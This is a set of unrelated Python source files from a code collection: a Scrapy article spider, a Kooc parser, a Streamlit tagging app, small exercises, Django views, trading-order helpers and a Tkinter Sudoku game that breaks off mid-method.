                    subject=subject,
                    title=item_node.xpath(
                        './/div[@class="highwire-cite-title media__headline__title"]'
                        + '|.//div[@class="highwire-cite-subtitle media__headline__subtitle"]').extract(),
                    contributors=item_node.xpath(
                        './/span[@class="highwire-citation-authors"]/span/text()').extract()
                )
                # pop('full') raises KeyError when the article has no
                # full-text variant -- presumably every TOC entry has one.
                yield Request(self.__url_root + self.get_links(item_node).pop('full'),
                              callback=self.parse_article,
                              meta={'science_journal_item': item})

    def parse_article(self, response):
        """Fill the remaining fields (abstract, keywords, references,
        acknowledgments, body content) from the article's full-text page."""
        item = response.meta['science_journal_item']
        full_text_node = response.xpath('//div[@class="article fulltext-view "]')
        item['abstract'] = full_text_node.xpath('./div[@class="section abstract"]').extract()
        item['keywords'] = full_text_node.xpath('./ul[@class="kwd-group"]/li[@class="kwd"]/text()').extract()
        item['references_and_notes'] = full_text_node.xpath('./div[@class="section ref-list"]'
                                                            + '/ol/li//div[@class="cit-metadata"]').extract()
        item['acknowledgments'] = full_text_node.xpath('./div[@class="ack"]').extract()
        # Everything except the sections captured above.
        item['content'] = full_text_node.xpath('./*[not(@class="section abstract"'
                                               + ' or @class="kwd-group"'
                                               + ' or @class="section ref-list"'
                                               + ' or @class="ack"'
                                               + ')]').extract()
        return item

    @staticmethod
    def get_links(item_node):
        """Map each media-link variant (keyed by its URL's final dot-separated
        segment, e.g. 'full') to its href."""
        links = item_node.xpath('.//ul[@class="variant-list media__links"]/li/a/@href').extract()
        result = {}
        for link in links:
            method_key = link.split('.').pop()
            result[method_key] = link
        return result
|
998,151 | 04d6e322ce254ac6a9cfa5b21f6d94beddba571b | import os
import subprocess
from weakref import ref
from lib import pyjack
import pyrser
from pyrser import meta
from pyrser.grammar import Grammar
from cnorm.parsing.declaration import Declaration
from cnorm.parsing.expression import Expression
from cnorm import nodes
from kooc_nodes import Import
from kooc_nodes import Module
from kooc_nodes import Implem
from kooc_nodes import Bracket
class Parser(Grammar, Declaration):
    """Kooc parser: extends cnorm's C declaration grammar with the Kooc
    directives ``@import``, ``@module``, ``@implementation`` and the
    bracket call syntax ``[Module method :arg]``.

    The hooks referenced from the grammar (importKoocFile, createModule,
    createImplem, saveDecl, ...) are registered at module level below via
    ``@meta.hook(Parser)``.
    """
    entry = 'translation_unit'
    grammar = """
        translation_unit =
        [
            @ignore("C/C++")
            [
                __scope__:current_block
                #new_root(_, current_block)
                [
                    #tryInit(_)
                    "@import" Base.string:n #importKoocFile(_, n) |
                    [ "@module" Base.id:n #createModule(_, n, current_block) | "@implementation" Base.id:n #createImplem(_, n, current_block) ]
                    '{' [ Declaration.declaration #saveDecl(_, current_block) ]* '}' #stopSavingDecls(current_block) |
                    Declaration.declaration
                ]*
            ]
            Base.eof
        ]

        primary_expression =
        [
            '(' expression:expr ')' #new_paren(_, expr)
            | [ Literal.literal | identifier ]:>_
            | bracket:>_
        ]

        bracket = [ [ type_specifier:>_ ]? '[' identifier:m ['.'?]:s identifier:n #createBracket(_, m, s, n) [ ':' assignement_expression:p #saveParam(_, p) ]* ']' ]

        type_specifier = [ "@!(" type_name:>_ ')' ]
    """

    def init(self, filename):
        """Preprocess `filename` with cpp into /tmp/kooc-<basename>.

        Raises CalledProcessError (via check_returncode) when cpp fails.
        """
        array = filename.split('/')
        self.tmp_filename = '/tmp/kooc-' + array[len(array) - 1]
        tmp_file = open(self.tmp_filename, 'w')
        completedProcess = subprocess.run(['/usr/bin/cpp', filename], stdout = tmp_file)
        tmp_file.close()
        completedProcess.check_returncode()

    def delete(self):
        """Remove the temporary preprocessed file created by init()."""
        os.remove(self.tmp_filename)

    def parse(self):
        """Parse the preprocessed file into self.AST."""
        self.AST = self.parse_file(self.tmp_filename)

    def buildSymTables(self):
        """Populate the global symbol table from top-level declarations and
        from every module's mangled declarations, recursing into function
        bodies to attach local symbol tables to brackets."""
        if not hasattr(self.AST, 'symTable'):
            self.AST.symTable = {}
        for item in self.AST.body:
            # Top-level declarations (typedefs excluded) enter the table.
            if isinstance(item, nodes.Decl) and item._ctype._storage != nodes.Storages.TYPEDEF:
                self.AST.symTable[item._name] = item._ctype
                if hasattr(item, 'body'):
                    # Function definition: remember its parameters for the
                    # local-table pass over the body.
                    self.paramList = item._ctype._params
                    self.buildLocalSymTables(item.body.body)
        for _,moduleRef in self.AST.modules.items():
            # Module declarations are stored mangled; register each mangling.
            for _,declList in moduleRef().declarations.items():
                for ctype,mangledName in declList:
                    self.AST.symTable[mangledName] = ctype
            for _,decl in moduleRef().definitions.items():
                if hasattr(decl, 'body'):
                    self.paramList = decl._ctype._params
                    self.privDecls = moduleRef().privateDeclarations
                    self.buildLocalSymTables(decl.body.body)

    def buildLocalSymTables(self, curItem):
        """Recursively collect Bracket nodes under `curItem` and give each a
        symbol table of the local declarations, current parameters and
        (when set) the module's private declarations.

        Returns the list of brackets found so callers can aggregate.
        """
        declList = []
        bracketList = []
        if isinstance(curItem, Bracket):
            bracketList.append(curItem)
            if not curItem.isVar:
                # Method-call bracket: its arguments may contain brackets too.
                for item in curItem.params:
                    bracketList.extend(self.buildLocalSymTables(item))
        elif isinstance(curItem, list):
            for item in curItem:
                if isinstance(item, nodes.Decl):
                    declList.append(item)
                else:
                    bracketList.extend(self.buildLocalSymTables(item))
        elif hasattr(curItem, '__dict__') and len(curItem.__dict__):
            # Generic AST node: recurse into every attribute.
            for _,item in curItem.__dict__.items():
                bracketList.extend(self.buildLocalSymTables(item))
        for bracket in bracketList:
            # Locals first (without overwriting), then parameters, then the
            # module's private declarations.
            for decl in declList:
                if decl._name not in bracket.symTable:
                    bracket.symTable[decl._name] = decl._ctype
            for decl in self.paramList:
                bracket.symTable[decl._name] = decl._ctype
            if hasattr(self, 'privDecls'):
                for _,decls in self.privDecls.items():
                    for ctype,mangledName in decls:
                        bracket.symTable[mangledName] = ctype
        return bracketList

    def saveBracketsExprRef(self):
        """Record, in AST order, a weak reference to the statement that holds
        the shallowest Bracket of each function body (both @implementation
        definitions and plain C definitions), deduplicating consecutive hits."""
        for item in self.AST.body:
            if isinstance(item, Implem):
                for _,definition in item.moduleRef().definitions.items():
                    startNodes = []
                    if hasattr(definition, 'body'):
                        for attr in definition.body.body:
                            startNodes.extend(self.getStartNodes(attr))
                    for node in startNodes:
                        if isinstance(node, nodes.Return):
                            # Let findBracket tag the bracket with the
                            # enclosing function's return type.
                            self.ret = definition._ctype
                        bracketRef = self.getShallowest(self.findBracket(node, None, 0))[1]
                        if hasattr(self, 'ret'):
                            delattr(self, 'ret')
                        if bracketRef is not None and (len(self.AST.brackets) == 0 or bracketRef() is not self.AST.brackets[len(self.AST.brackets) - 1]()):
                            self.AST.brackets.append(bracketRef)
            elif isinstance(item, nodes.Decl) and hasattr(item, 'body'):
                startNodes = []
                for attr in item.body.body:
                    startNodes.extend(self.getStartNodes(attr))
                for node in startNodes:
                    if isinstance(node, nodes.Return):
                        self.ret = item._ctype
                    bracketRef = self.getShallowest(self.findBracket(node, None, 0))[1]
                    if bracketRef is not None and (len(self.AST.brackets) == 0 or bracketRef() is not self.AST.brackets[len(self.AST.brackets) - 1]()):
                        self.AST.brackets.append(bracketRef)

    def getStartNodes(self, curItem):
        """Flatten a statement subtree into the list of statements that can
        directly contain expressions (decls, expression statements, returns,
        loop/branch headers), recursing through compound statements."""
        startNodes = []
        if isinstance(curItem, nodes.Decl) or isinstance(curItem, nodes.ExprStmt) or isinstance(curItem, nodes.Return) or isinstance(curItem, nodes.Unary):
            startNodes.append(curItem)
        elif isinstance(curItem, nodes.BlockStmt):
            for item in curItem.body:
                startNodes.extend(self.getStartNodes(item))
        elif isinstance(curItem, nodes.Do) or isinstance(curItem, nodes.Switch) or isinstance(curItem, nodes.While):
            startNodes.append(curItem)
            startNodes.extend(self.getStartNodes(curItem.body))
        elif isinstance(curItem, nodes.If):
            startNodes.append(curItem)
            startNodes.extend(self.getStartNodes(curItem.elsecond))
            startNodes.extend(self.getStartNodes(curItem.thencond))
        elif isinstance(curItem, nodes.For):
            startNodes.extend(self.getStartNodes(curItem.body))
            startNodes.extend(self.getStartNodes(curItem.condition))
            startNodes.extend(self.getStartNodes(curItem.increment))
            startNodes.extend(self.getStartNodes(curItem.init))
        return startNodes

    def findBracket(self, attr, parentAttr, depth):
        """Generator yielding (depth, weakref-to-parent) for every Bracket
        reachable under `attr`; (-1, None) marks dead ends so getShallowest
        can skip them."""
        for _,subAttr in attr.__dict__.items():
            if isinstance(subAttr, Bracket):
                if hasattr(self, 'ret'):
                    # Propagate the enclosing function's return type onto the
                    # bracket (set by saveBracketsExprRef for Return nodes).
                    subAttr.ret = self.ret
                    delattr(self, 'ret')
                yield (depth, ref(attr))
            elif isinstance(subAttr, pyrser.parsing.node.Node):
                yield self.getShallowest(self.findBracket(subAttr, attr, depth + 1))
            elif isinstance(subAttr, list): # and len(subAttr)
                for i in range(len(subAttr)):
                    if isinstance(subAttr[i], Bracket):
                        yield (depth, ref(attr))
                    else:
                        yield self.getShallowest(self.findBracket(subAttr[i], attr, depth + 1))
            else:
                yield (-1, None)

    def getShallowest(self, gen):
        """Reduce a findBracket generator to its shallowest (depth, ref) hit;
        returns (-1, None) when no bracket was found."""
        minDepth = -1
        shallowParentRef = None
        for depth,parentRef in gen:
            if depth != -1 and (minDepth == -1 or depth < minDepth):
                minDepth = depth
                shallowParentRef = parentRef
        return (minDepth, shallowParentRef)
@meta.hook(Parser)
def tryInit(self, root):
    """Grammar hook: ensure the root AST node carries the Kooc registries
    (imports/modules/implems/brackets), adopting any registries seeded on
    the parser by a parent import (see importKoocFile)."""
    self.root = root
    if hasattr(self, 'imports') and hasattr(self, 'modules') and hasattr(self, 'implems'):
        # A parent parser seeded shared registries; transfer them to this root.
        root.imports = self.imports
        root.modules = self.modules
        root.implems = self.implems
        root.types = self.types
        delattr(self, 'imports')
        delattr(self, 'modules')
        delattr(self, 'implems')
        delattr(self, 'types')
    # First-time defaults for a standalone parse.
    if not hasattr(root, 'imports'):
        root.imports = {}
    if not hasattr(root, 'modules'):
        root.modules = {}
    if not hasattr(root, 'implems'):
        root.implems = {}
    if not hasattr(root, 'brackets'):
        root.brackets = []
    return True
@meta.hook(Parser)
def importKoocFile(self, root, filename):
    """Grammar hook for ``@import "file"``: recursively parse the imported
    file with a child Parser sharing this root's registries, then merge
    the resulting Import node's registries back into the root.

    Already-imported files are skipped (root.imports acts as the guard).
    """
    # Strip the surrounding quotes from the string token.
    filename = self.value(filename)[1:len(self.value(filename))-1]
    if not filename in root.imports:
        root.imports[filename] = None   # reserve the slot to break cycles
        parser = Parser()
        parser.init(filename)
        # Seed the child with the shared registries (consumed by tryInit).
        parser.imports = root.imports
        parser.modules = root.modules
        parser.implems = root.implems
        parser.types = root.types
        parser.parse()
        parser.buildSymTables()
        parser.saveBracketsExprRef()
        importNode = Import(filename, parser.AST)
        parser.delete()
        # Merge only entries the root does not already have.
        root.imports.update({ k:v for k,v in importNode.imports.items() if k not in root.imports })
        root.modules.update({ k:v for k,v in importNode.modules.items() if k not in root.modules })
        root.implems.update({ k:v for k,v in importNode.implems.items() if k not in root.implems })
        root.brackets.extend(importNode.brackets)
        if not hasattr(root, 'symTable'):
            root.symTable = {}
        root.symTable.update(importNode.symTable)
        root.types = importNode.types
        # The Import node keeps only its body; registries now live on root.
        delattr(importNode, 'imports')
        delattr(importNode, 'modules')
        delattr(importNode, 'implems')
        delattr(importNode, 'brackets')
        delattr(importNode, 'types')
        root.body.append(importNode)
        root.imports[filename] = ref(importNode)
    return True
# @module handling
@meta.hook(Parser)
def createModule(self, root, name, current_block):
    """Grammar hook for ``@module <name>``: create a Module node, register
    it on the root, and redirect following declarations into it.

    Returns False (parse error) when the name was already declared.
    """
    name = self.value(name)
    # Bug fix: the original tested `name in root.modules.items()`, which
    # compares the string against (key, value) tuples and is always False,
    # so duplicate module declarations were never detected. Membership must
    # be tested against the dict's keys.
    if name in root.modules:
        print('error: module or class "' + name + '" has already been declared')
        return False
    moduleNode = Module(name, root.body, len(root.body))
    root.body.append(moduleNode)
    root.modules[name] = ref(moduleNode)
    # Declarations inside the following '{ ... }' are routed into this
    # module by saveDecl until stopSavingDecls clears the pointer.
    current_block.nextDeclLoc = ref(moduleNode)
    return True
# @implementation handling
@meta.hook(Parser)
def createImplem(self, root, name, current_block):
    """Grammar hook for ``@implementation <name>``: create (once) an Implem
    node for a previously declared module and redirect following
    definitions into that module.

    Returns False (parse error) when no module of that name exists.
    """
    name = self.value(name)
    moduleRef = root.modules.get(name)
    if moduleRef is None:
        print('error: module or class "' + name + '" has not been declared')
        return False
    # Bug fix: the original tested `name in root.implems.items()`, which
    # compares the string against (key, value) tuples and is always False,
    # so a fresh Implem node was appended on every @implementation block.
    # Test membership against the dict's keys instead.
    if name not in root.implems:
        implemNode = Implem(name, moduleRef, root.body, len(root.body))
        root.body.append(implemNode)
        root.implems[name] = ref(implemNode)
    current_block.nextDefLoc = moduleRef
    return True
# save @{module,implem} content
@meta.hook(Parser)
def saveDecl(self, root, current_block):
    """Grammar hook: move the declaration just parsed (last element of
    root.body) into the pending module -- as a declaration when inside
    @module, as a definition when inside @implementation."""
    if hasattr(current_block, 'nextDeclLoc') and current_block.nextDeclLoc is not None:
        current_block.nextDeclLoc().saveDeclaration(root.body.pop())
    elif hasattr(current_block, 'nextDefLoc') and current_block.nextDefLoc is not None:
        current_block.nextDefLoc().saveDefinition(root.body.pop())
    return True
@meta.hook(Parser)
def stopSavingDecls(self, current_block):
    """Grammar hook: leaving a '{ ... }' block -- stop routing declarations
    and definitions into any module."""
    current_block.nextDeclLoc = None
    current_block.nextDefLoc = None
    return True
# Brackets handling
@meta.hook(Parser)
def createBracket(self, node, module, separator, name):
    """Grammar hook for ``[Module name ...]``: replace the parsed node,
    everywhere it is referenced, with a Bracket (pyjack rewrites all live
    references in place). A '.' separator marks a variable access rather
    than a method call."""
    pyjack.replace_all_refs(node, Bracket(self.value(module), self.value(name), self.value(separator) == '.', node, self.root.modules))
    return True
@meta.hook(Parser)
def saveParam(self, bracketNode, param):
    """Grammar hook: attach one ``:expr`` argument to the current bracket."""
    bracketNode.addParam(param)
    return True
|
998,152 | 678c69e0de709884695b9acf4aad4a310b6cba4c | import streamlit as st
import pandas as pd
import numpy as np
from openpyxl import Workbook, load_workbook
import SessionState
"""
This function takes in a dataframe and returns a dictionary with the topic title as key and the leading comment as value
"""
#@st.cache(suppress_st_warning=True, allow_output_mutation=True) # This function will be cashed and won't be run again
def load_data(unlabeled_data):
    """Read the scraped-posts CSV at `unlabeled_data` and return
    (data_dic, iterate_key, curr_key): a {topic title: leading comment}
    dict, an iterator over its keys, and the first topic title."""
    def get_data_from_file(df):
        # Map each topic title to its leading comment.
        dic = {}
        for row in range(len(df)):
            dic[df['Topic Title'].iloc[row]] = df['Leading Comment'].iloc[row]
        return dic
    """
    These two statements read in our desired csv files. The first one reads in the file that contains all redefined TagNames, which we have to make ourselves. The second contains scrapped data.
    """
    #df_all_tag = pd.read_csv("FileWithAllTagName.csv")
    df_posts = pd.read_csv(unlabeled_data)
    #new_labeled_topics: is the dataframe where we store labeled data
    new_labeled_topics = df_posts.copy()
    #data_dic: contains the the scrapped data: with the topic title as key and the leading comment as value
    data_dic = get_data_from_file(df_posts)
    #iterate_key: an iterater that goes to the next topic when called next(iterate_key)
    iterate_key = iter(data_dic.keys())
    #curr_key: the tracker that keeps track of the current topic title that we are on
    curr_key = next(iterate_key)
    return data_dic, iterate_key, curr_key
"""
Below is mainly code for StreamLit display.
"""
st.write("""
** ML July Team1 Manual Tagging App**
""")
#the line below is for the drop down menu for tag selection. We will switch df_posts with df_all_tag.
data_dic, iterate_key, curr_key = load_data("StackOverflow_new_tags.csv")
#importing tags list
df_tags = pd.read_csv("Tags.csv")
tags_list = df_tags.Tags.tolist()
#remove the tagged post from the dataset and reset
if st.button("Reset"):
df_posts = pd.read_csv("StackOverflow_new_tags.csv")
df_posts = df_posts.iloc[1:]
df_posts.to_csv("StackOverflow_new_tags.csv")
#displays next topic
session = SessionState.get(run_id=0)
if st.button("Next Topic"):
session.run_id += 1
options = st.multiselect('Please select suitable tags for the following topic.', tags_list, key=session.run_id)
st.write('You selected:', options)
st.write("Topic Title:")
st.write(curr_key)
st.write("Leading Comment:")
st.write(data_dic[curr_key])
#writes the tagged post to a excel file
if st.button("Submit"):
df = pd.read_csv('LabeledData.csv')
row_to_append = pd.DataFrame({df.columns[0]: [curr_key], df.columns[1]: [data_dic[curr_key]], df.columns[2]: [options]})
df = df.append(row_to_append)
df.to_csv('LabeledData.csv', index=False)
|
998,153 | 9fa63b60043d5684455ac79c54e332daaf490778 | # Tentamen versie :BMFWRDZN
# Gegevens :Reuben Domacasse 0918901 23-10-2017
# Opgave :1-001
# Inleiding: De inhoud van een voorwerp met een diameter van 33 cm wordt berekend met de formule: 1/8 x 3,14 x (33^4) / 5
# Opdracht: Schrijf een programma dat deze berekening uitvoert.
# Eisen: Vervang de getallen door variabelen.
# De uitkomst wordt op het scherm geprint met de zin: "De inhoud van de bol is x kubieke cm"
# Waarbij x de uitkomst is van de berekening
# Programma: DIAMETER BEREKENEN
# Define the constant pi.
pi = float(3.14)
# Precomputed term (33^4) / 5 of the formula. NOTE(review): despite the
# name, this variable holds the computed term, not the 33 cm diameter.
diameter = (33**4)/5
# The 1/8 factor of the formula.
hoogte = 1/8
# Full formula 1/8 * 3.14 * (33^4) / 5, converted to a string for printing.
x = str(float(hoogte*pi*diameter))
# Print the result ("The volume of the sphere is x cubic cm").
print ("De inhoud van de bol is "+x+" kubieke cm.")
998,154 | 534489e080080c32d8e77c3c74435cdeeb523ece | # Ejercicio propuesto por Guillermo Cirer
# Lesson 2: Problem set (Optional 2)
# Superhero Nuisance
# Enunciado del ejercicio:
# Write a Python procedure fix_machine to take 2 string inputs
# and returns the 2nd input string as the output if all of its
# characters can be found in the 1st input string and "Give me
# something that's not useless next time." if it's impossible.
# Letters that are present in the 1st input string may be used
# as many times as necessary to create the 2nd string (you
# don't need to keep track of repeat usage).
def fix_machine(escombros, producto):
    """Return `producto` when every one of its characters occurs somewhere
    in `escombros`; otherwise return a complaint message.

    Both arguments are coerced to strings first, so numeric inputs are
    accepted. Characters from `escombros` may be reused any number of
    times (repeat usage is not tracked).
    """
    fuente = str(escombros)
    objetivo = str(producto)
    for simbolo in objetivo:
        if simbolo not in fuente:
            return "Give me something that's not useless next time."
    return objetivo
# TEST CASES funcion fix_machine:
# The first two print the raw return value; the rest print True when the
# function matches the expected result.
print("Otro tipo de test", fix_machine(12,"1"))
print("Otro tipo de test", fix_machine('skgdhaa','hada'))
print("Test case 1: ", fix_machine('UdaciousUdacitee', 'Udacity') == "Give me something that's not useless next time.")
print("Test case 2: ", fix_machine('buy me dat Unicorn', 'Udacity') == 'Udacity')
print("Test case 3: ", fix_machine('AEIOU and sometimes y... c', 'Udacity') == 'Udacity')
print("Test case 4: ", fix_machine('wsx0-=mttrhix', 't-shirt') == 't-shirt')
print("Test case 5: ", fix_machine('matrix reloaded', 'dedo mixta lordo') == 'dedo mixta lordo')
998,155 | 6d55d42180b146cae6ab59196feab66f56fe912b | from lib.util import BaseAPIView
from rest_framework.views import APIView
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from rest_framework import status
from Apps.fcb.models import *
from rest_framework.generics import ListAPIView
from Apps.fcb.serializers import PlayerListSerializer
class RetriveNews(APIView, BaseAPIView):
    """Return the News items of a requested type as JSON.

    GET param ``type`` is the human-readable choice label; it is matched
    against the display names of the News model's ``type`` choices.
    """
    permission_classes = (AllowAny,)
    def get(self, request):
        try:
            news_type = request.GET.get('type',None)
            news =[]
            index = -1
            # NOTE(review): `type` shadows the builtin; it holds the model
            # field's (value, label) choice pairs.
            type = News._meta.get_field('type').choices
            for item in type:
                if item[1]==news_type:
                    index=item[0]
            # Assumes valid choice values are > 0 -- TODO confirm against the
            # News model's choice definitions.
            if index>0:
                for item in News.objects.filter(type=index):
                    news.append({
                        'title':item.title,
                        'large_img': item.large_img.url,
                        'small_img': item.small_img.url,
                        'source':item.source,
                        'content':item.content,
                    })
            self.response.data=news
            self.response.status_code=200
            return Response(self.response.as_dict(), headers={'Access-Control-Allow-Origin': '*'},status=status.HTTP_200_OK)
        except Exception as e:
            # NOTE(review): any failure (missing image file, DB error, ...)
            # is reported as 415 Unsupported Media Type; consider narrowing.
            return Response(status=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)
class RetrivePlayerList(ListAPIView):
    """List every Player, serialized with PlayerListSerializer."""
    permission_classes = (AllowAny,)
    serializer_class = PlayerListSerializer
    queryset = Player.objects.all()
|
998,156 | b965383e225fd381da63b82edf80d981c0da7e96 | import sys
import socket
import json
"""
Method evaluates bond order based on price. Returns a json
order to execute
"""
def evaluate_bond_order(book, order_id, positions):
    """Decide the next BOND order given the current order book.

    ``book['BOND']`` is a (best_bid, best_ask) pair where each side is
    either 0 (empty) or a (price, size) sequence. BOND has a known fair
    value of 1000: buy when the best bid is below it, sell when the best
    ask is above it.

    Returns a json-serializable order dict, or None when neither side is
    profitable. `positions` is kept for interface compatibility but is no
    longer inspected -- the original called calculate_positions() and
    discarded both results (dead code, removed).
    """
    bid, ask = book['BOND'][0], book['BOND'][1]
    # Empty bid side: post a resting buy just below fair value.
    if bid == 0:
        return {"type": "add", "order_id": order_id, "symbol": "BOND",
                "dir": "BUY", "price": 999, "size": 1}
    # Empty ask side. NOTE(review): the original posts a BUY at 1001 here;
    # a SELL would be the symmetric action -- preserved as-is, confirm intent.
    if ask == 0:
        return {"type": "add", "order_id": order_id, "symbol": "BOND",
                "dir": "BUY", "price": 1001, "size": 1}
    buy_price = bid[0]
    sell_price = ask[0]
    if sell_price > 1000:
        return {"type": "add", "order_id": order_id, "symbol": "BOND",
                "dir": "SELL", "price": sell_price, "size": 1}
    if buy_price < 1000:
        return {"type": "add", "order_id": order_id, "symbol": "BOND",
                "dir": "BUY", "price": buy_price, "size": 1}
    return None
def balance_fill(book, fmv_book, fill_order, order_id):
    """Emit the opposite-side order that offsets a just-filled order.

    BOND fills are offset around its fair value of 1000 (sell at 1001
    after a buy, buy at 999 after a sell). Any other symbol is offset one
    tick around its fair market value taken from ``fmv_book[symbol][1]``.
    `book` is unused but kept for interface compatibility.
    """
    symbol = fill_order["symbol"]
    filled_size = fill_order["size"]
    was_buy = fill_order["dir"] == "BUY"
    if symbol == "BOND":
        price = 1001 if was_buy else 999
    else:
        fair_value = fmv_book[symbol][1]
        # spread = (book[symbol][1][0] - book[symbol][0][0]) // 2
        price = fair_value + 1 if was_buy else fair_value - 1
    side = "SELL" if was_buy else "BUY"
    return {"type": "add", "order_id": order_id, "symbol": symbol,
            "dir": side, "price": price, "size": filled_size}
def calculate_positions(positions):
    """Translate the current BOND position into a (buy_room, sell_room) pair.

    A flat position reports (100, 100); a long position leaves room only
    to sell; a short position reports the raw (negative) position as the
    first component, matching the original behavior.
    """
    bond_position = positions["BOND"]
    if bond_position == 0:
        return 100, 100
    if bond_position > 0:
        return 0, bond_position
    # NOTE(review): a negative first component is an odd "size"; preserved
    # exactly as originally computed.
    return bond_position, 0
|
998,157 | 15464512d5e19f604ddb0db052047993c5df079a | from tkinter import Tk, Canvas, Frame, Button, BOTH, TOP, BOTTOM, LEFT, RIGHT, Label
import copy
from gameAI import Game_Solver
from sudokuGenerator import generate
MARGIN = 80    # pixels of padding around the board
SIDE = 120     # pixel size of one Sudoku cell
WIDTH = HEIGHT = MARGIN * 2 + SIDE * 9   # total canvas size (9x9 grid)
LEVEL = "Easy"   # module-level default difficulty
class SudokuUI(Frame):
    """
    Tkinter front-end for a Sudoku game: draws the grid and numbers,
    handles cell selection and digit entry, and offers buttons to clear,
    auto-solve, and generate new puzzles at four difficulty levels.
    """
    def __init__(self, parent, game):
        self.game = game       # game state object (puzzle, start_puzzle, win check)
        self.parent = parent   # enclosing Tk root window
        Frame.__init__(self, parent)
        # Currently selected cell; (-1, -1) / (0, 0) means effectively none.
        self.row = 0
        self.col = 0
        self.level = None      # difficulty chosen via the New Puzzle buttons
        self.__initUI()

    def __initUI(self):
        """
        Build the window: canvas for the board plus the control buttons,
        then draw the grid/puzzle and bind mouse and keyboard handlers.
        """
        self.parent.title("Sudoku")
        self.pack(fill=BOTH, expand=1)
        self.canvas = Canvas(self, bg = "white" , width = WIDTH, height = HEIGHT)
        self.canvas.pack(fill=BOTH, side=TOP)
        clear_button = Button(self,
                              text="Clear answers",
                              height = HEIGHT // 15,
                              font = ("Monaco", HEIGHT // 62),
                              command=self.__clear_answers)
        solver_button = Button(self,
                               text = "Solve Puzzle",
                               height = HEIGHT // 15,
                               font = ("Monaco", HEIGHT // 62),
                               command=self.__solve_puzzle
                               )
        New_Label = Label(self, text = "New Puzzle : ", font = ("Monaco, 20"))
        easy_button = Button(self, text = "Easy", font = ("Monaco", 20), command = self.__easy_clicked)
        medium_button = Button(self, text = "Medium", font = ("Monaco", 20), command = self.__medium_clicked)
        hard_button = Button(self, text = "Hard", font = ("Monaco", 20), command = self.__hard_clicked)
        insane_button = Button(self, text = "Insane", font = ("Monaco", 20), command = self.__insane_clicked)
        clear_button.pack(side = LEFT)
        solver_button.pack(side = LEFT)
        # Packed right-to-left, so on screen they read Easy..Insane.
        insane_button.pack(side = RIGHT)
        hard_button.pack(side = RIGHT)
        medium_button.pack(side = RIGHT)
        easy_button.pack(side = RIGHT)
        New_Label.pack(side = RIGHT)
        self.__draw_grid()
        self.__draw_puzzle()
        # self.cell_click and self.key_pressed is a callback function , much like JS
        self.canvas.bind("<Button-1>", self.__cell_clicked)
        self.canvas.bind("<Key>", self.__key_pressed)

    def fresh_start(self):
        """
        Generate a new puzzle at the current difficulty and redraw.
        """
        self.__clear_answers()
        fresh_board = generate(self.level)
        # Keep an untouched copy so original clues can be distinguished.
        self.game.start_puzzle = copy.deepcopy(fresh_board)
        self.game.puzzle = fresh_board
        self.__draw_puzzle()

    def __easy_clicked(self):
        """
        Start a new Easy puzzle.
        """
        self.level = "Easy"
        self.fresh_start()

    def __medium_clicked(self):
        """
        Start a new Medium puzzle.
        """
        self.level = "Medium"
        self.fresh_start()

    def __hard_clicked(self):
        """
        Start a new Hard puzzle.
        """
        self.level = "Hard"
        self.fresh_start()

    def __insane_clicked(self):
        """
        Start a new Insane puzzle.
        """
        self.level = "Insane"
        self.fresh_start()

    def __draw_grid(self):
        """
        Draw the 10 horizontal and 10 vertical grid lines; every third
        line (the 3x3 box boundaries) is blue, the rest grey.
        """
        for i in range(10):
            if i % 3 == 0:
                color = "blue"
            else:
                color = "grey"
            # Vertical line i.
            x0 = MARGIN + i * SIDE
            y0 = MARGIN
            x1 = MARGIN + i * SIDE
            y1 = WIDTH - MARGIN
            self.canvas.create_line(x0, y0, x1, y1, fill=color)
            # Horizontal line i.
            y0 = MARGIN + i * SIDE
            x0 = MARGIN
            y1 = MARGIN + i * SIDE
            x1 = WIDTH - MARGIN
            self.canvas.create_line(x0, y0, x1, y1, fill=color)

    def __draw_puzzle(self):
        """
        Redraw all filled cells: original clues in red, user entries in
        dark green. Zero means an empty cell.
        """
        self.canvas.delete("numbers")
        for i in range(9):
            for j in range(9):
                answer = self.game.puzzle[i][j]
                if answer != 0:
                    x = MARGIN + j * SIDE + SIDE / 2
                    y = MARGIN + i * SIDE + SIDE / 2
                    original = self.game.start_puzzle[i][j]
                    if answer == original:
                        color = "red"
                    else:
                        color = "dark green"
                    self.canvas.create_text(x, y, text=answer, tags="numbers", fill = color, font = ("Monaco", 25))

    def __clear_answers(self):
        """
        Reset the game to its starting puzzle and clear any victory overlay.
        """
        self.game.start()
        self.canvas.delete("victory")
        self.canvas.delete("winner")
        self.__draw_puzzle()

    def __cell_clicked(self, event):
        """
        Select the clicked cell (or deselect it if clicked twice); only
        empty cells become selectable targets for digit entry.
        """
        if self.game.game_over:
            return
        # Event class gives us current x and current ys
        x = event.x
        y = event.y
        if(MARGIN < x < WIDTH - MARGIN and MARGIN < y < HEIGHT - MARGIN):
            self.canvas.focus_set()
            # Get row and column from x , y coordinates
            row = (y - MARGIN) // SIDE
            col = (x - MARGIN) // SIDE
            # if cell was selected already - deselect it
            if (row, col) == (self.row, self.col):
                self.row, self.col = -1, -1
            elif self.game.puzzle[row][col] == 0:
                self.row, self.col = row, col
        self.__draw_cursor()

    def __draw_cursor(self):
        """
        Outline the currently selected cell in red (if any).
        """
        self.canvas.delete("cursor")
        if self.row >= 0 and self.col >= 0:
            x0 = MARGIN + self.col * SIDE + 1
            y0 = MARGIN + self.row * SIDE + 1
            x1 = MARGIN + (self.col + 1) * SIDE - 1
            y1 = MARGIN + (self.row + 1) * SIDE - 1
            self.canvas.create_rectangle(
                x0, y0, x1, y1,
                outline="red", tags="cursor"
            )

    def __key_pressed(self, event):
        """
        Write a typed digit into the selected cell, deselect, redraw, and
        show the victory overlay when the board is complete. Typing 0
        effectively clears the cell.
        """
        if self.game.game_over:
            return
        if self.row >= 0 and self.col >= 0 and event.char in "1234567890":
            self.game.puzzle[self.row][self.col] = int(event.char)
            self.col = -1
            self.row = -1
            self.__draw_puzzle()
            self.__draw_cursor()
            if self.game.check_win():
                self.__draw_victory()

    def __draw_victory(self):
        """
        Draw the orange "You win!" circle overlay in the board's center.
        """
        x0 = y0 = MARGIN + SIDE * 2
        x1 = y1 = MARGIN + SIDE * 7
        self.canvas.create_oval(
            x0, y0, x1, y1,
            tags="victory", fill="dark orange", outline="orange"
        )
        # create text
        x = y = MARGIN + 4 * SIDE + SIDE / 2
        self.canvas.create_text(
            x, y,
            text="You win!", tags="winner",
            fill="white", font=("Arial", 32)
        )

    def __solve_puzzle(self):
        """
        Reset to the starting puzzle, solve it in place with Game_Solver
        (printing before/after boards to stdout), and redraw.
        """
